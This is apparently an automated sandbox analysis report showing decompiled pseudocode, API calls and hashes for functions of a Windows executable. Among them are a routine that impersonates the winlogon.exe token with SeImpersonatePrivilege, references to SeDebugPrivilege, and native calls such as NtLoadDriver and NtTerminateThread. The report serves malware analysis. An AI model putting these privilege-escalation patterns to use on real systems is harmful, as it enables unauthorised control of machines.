Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

0x00401f04
0x00401f20
0x00401f27
0x00401f38
0x00401f3f
0x00401f4e
0x00401f54
0x00401f5f
0x00401f6e
0x00401f72
0x00401f77
0x00401f78
0x00401f91
0x00401f7a
0x00401f88
0x00401f8e
0x00401f8e
0x00401fa6
0x00401fa9
0x00401fae
0x00401fb0
0x00401fb2
0x00401fb9
0x00401fc2
0x00401fca
0x00401fd2
0x00401fd2
0x00401fd7
0x00401fd7
0x00401fe3

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

SeImpersonatePrivilege, xrefs: 00401FB4
winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

kernel32.dll, xrefs: 00409561
GetProcessTimes, xrefs: 00409570

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fbd
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x00409ddc
0x00409de4
0x00409df0
0x00409df5
0x00409df6
0x00409e03
0x00409e05
0x00409e06
0x00409e3b
0x00409e5d
0x00409e6a
0x00409e73
0x00409e75
0x00409e08
0x00409e08
0x00409e19
0x00409e37
0x00409e37
0x00409e81

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x00404951
0x00404952
0x00404956
0x004049a1
0x00404958
0x00404959
0x0040495b
0x0040495b
0x0040495f
0x00404961
0x00404963
0x0040496d
0x00404975
0x00404977
0x0040497b
0x00404985
0x0040498a
0x0040498e
0x00404993
0x0040499d
0x0040499d

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00409EA9

Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

0x00408e38
0x00408e44
0x00408e56
0x00408e68
0x00408e7a
0x00408e8c
0x00408e9e
0x00408eb0
0x00408ec2
0x00408ed4
0x00408ee6
0x00408ef8
0x00408f0a
0x00408f1c
0x00408f21
0x00408f23
0x00000000
0x00408f28
0x00408f29

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtQueryInformationThread, xrefs: 00408EDB
NtSuspendThread, xrefs: 00408EED
NtClose, xrefs: 00408EC9
NtLoadDriver, xrefs: 00408E5D
NtTerminateThread, xrefs: 00408F11
ntdll.dll, xrefs: 00408E3F
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtQueryObject, xrefs: 00408EA5
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtUnloadDriver, xrefs: 00408E6F
NtResumeThread, xrefs: 00408EFF
NtQuerySystemInformation, xrefs: 00408E50
NtOpenThread, xrefs: 00408EB7

Memory Dump Source

